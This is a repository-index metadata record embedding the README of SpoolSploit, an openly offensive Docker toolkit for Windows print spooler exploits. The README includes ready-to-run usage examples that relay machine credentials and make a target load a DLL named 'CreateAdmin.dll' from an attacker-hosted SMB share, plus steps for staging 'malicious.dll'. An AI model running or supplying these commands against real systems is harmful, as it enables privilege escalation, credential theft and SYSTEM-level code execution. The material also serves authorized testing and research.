{"id":13510821,"url":"https://github.com/BeetleChunks/SpoolSploit","last_synced_at":"2025-03-30T17:31:28.531Z","repository":{"id":44409378,"uuid":"383631190","full_name":"BeetleChunks/SpoolSploit","owner":"BeetleChunks","description":"A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","archived":false,"fork":false,"pushed_at":"2021-07-16T04:49:43.000Z","size":2781,"stargazers_count":551,"open_issues_count":0,"forks_count":90,"subscribers_count":17,"default_branch":"main","last_synced_at":"2024-11-01T11:35:09.438Z","etag":null,"topics":["container","cve-2021-1675","cve-2021-34527","docker","exploit","print","printspooler","python","rpc","scanner","spool","vulnerabilities","windows"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BeetleChunks.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-07-07T00:32:28.000Z","updated_at":"2024-10-28T18:14:23.000Z","dependencies_parsed_at":"2022-07-11T04:00:24.841Z","dependency_job_id":null,"html_url":"https://github.com/BeetleChunks/SpoolSploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeetleChunks%2FSpoolSploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeetleChunks%2FSpoolSploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeetleChunks%2FSpoolSploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BeetleChunks%2FSpoolSploit/manif
ests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BeetleChunks","download_url":"https://codeload.github.com/BeetleChunks/SpoolSploit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246355384,"owners_count":20763990,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["container","cve-2021-1675","cve-2021-34527","docker","exploit","print","printspooler","python","rpc","scanner","spool","vulnerabilities","windows"],"created_at":"2024-08-01T02:01:55.316Z","updated_at":"2025-03-30T17:31:28.526Z","avatar_url":"https://github.com/BeetleChunks.png","language":"Python","readme":"# SpoolSploit\nA collection of Windows print spooler exploits containerized with other utilities for practical exploitation.\n\n## Summary\nSpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access.\n\n![img](./media/SpoolSploit-Usage.PNG)\n\n## Getting Started\nAs of the release date the SpoolSploit Docker container has been tested successfully on the latest versions of ```MacOS```, ```Ubuntu Linux```, and ```Windows 10```.\n\nAlthough not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. 
This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the Docker container in a virtual machine that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relaying credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.\n\n### Create and access the SpoolSploit Docker container\n1. Clone this repository\n```\ngit clone https://github.com/BeetleChunks/SpoolSploit\n```\n2. Build the SpoolSploit Docker container image\n```\ncd SpoolSploit\nsudo docker build -t spoolsploit .\n```\n3. Create and start the SpoolSploit Docker container\n```\nsudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest\n```\n4. Attach to the container\n```\nsudo docker exec -it spoolsploit /bin/bash\n```\n\n### Command-line Usage\n```\nusage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -a {spoolsample,nightmare}, --attack {spoolsample,nightmare}\n                        Attack type to execute on target(s).\n  -rH RHOST, --rhost RHOST\n                        Remote target IP, CIDR range, or filename (file:\u003cpath\u003e)\n  -rP {139,445}, --rport {139,445}\n                        Remote SMB server port.\n  -lH LHOST, --lhost LHOST\n                        Listening hostname or IP\n  -lS LSHARE, --lshare LSHARE\n                        Staging SMB share (UNC)\n  -d DOMAIN, --domain DOMAIN\n                        Domain for authentication\n  -u USER, --username USER\n                        Username for authentication\n  -p PASSWD, --password PASSWD\n                        Password for authentication\n\nExample - spoolsample:\n  python3 
spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10\n\nExample - nightmare:\n  python3 spool_sploit.py -a nightmare -lS '\\\\10.14.1.24\\C$\\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10\n```\n\n### SpoolSample - Capture and relay Windows machine account credentials\nThe SpoolSploit Docker container includes [Responder](https://github.com/lgandx/Responder) for relaying machine account hashes obtained from executing the ```spoolsample``` attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"media/SpoolSample.gif\" width=\"75%\"\u003e\n\u003c/p\u003e\n\n### PrintNightmare (CVE-2021-1675) - Execute malicious DLLs on Windows targets as SYSTEM\nIncluded in the SpoolSploit container is an SMB server implemented via [Impacket](https://github.com/SecureAuthCorp/impacket). This server can be used to host malicious DLLs when executing the ```printnightmare``` attack in SpoolSploit. The default SMB server settings work, but if you want to customize them you can modify the configuration file located at ```/home/dlogmas/smbserver/smb-v1.conf```.\n\nThe only thing you need to do is copy your DLL to the SMB server's share folder in the SpoolSploit container. The share path in the container is ```/home/dlogmas/smbserver/share/```. 
The following commands demonstrate how to upload a DLL to the SpoolSploit container and make it accessible to the SMB server.\n\n```\nsudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/\nsudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'\n```\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"media/PrintNightmare.gif\" width=\"75%\"\u003e\n\u003c/p\u003e\n\n# Disclaimer\nThis proof-of-concept code has been created for academic research and is not intended to be used against systems except where explicitly authorized. The code is provided as is with no guarantees or promises on its execution. I am not responsible or liable for misuse of this code.\n\n# Credits\n## SpoolSample - Microsoft Feature\n- [leechristensen](https://github.com/leechristensen/SpoolSample) discovered the SpoolSample exploit and created a C# POC [SpoolSample](https://github.com/leechristensen/SpoolSample/tree/master/SpoolSample)\n- [3xocyte](https://gist.github.com/3xocyte) created a Python2 SpoolSample POC [dementor](https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#file-dementor-py).\n\n## PrintNightmare - CVE-2021-1675 / CVE-2021-34527\n- [cube0x0](https://github.com/cube0x0) created Python PrintNightmare exploit after implementing the MS-PAR \u0026 MS-RPRN protocols and API calls in [Impacket](https://github.com/SecureAuthCorp/impacket).\n- [Zhiniang Peng](https://twitter.com/edwardzpeng) \u0026 [Xuefeng Li](https://twitter.com/lxf02942370) discovered this exploit.\n","funding_links":[],"categories":["Python","windows"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBeetleChunks%2FSpoolSploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FBeetleChunks%2FSpoolSploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBeetleChunks%2FSpoolSploit/lists"}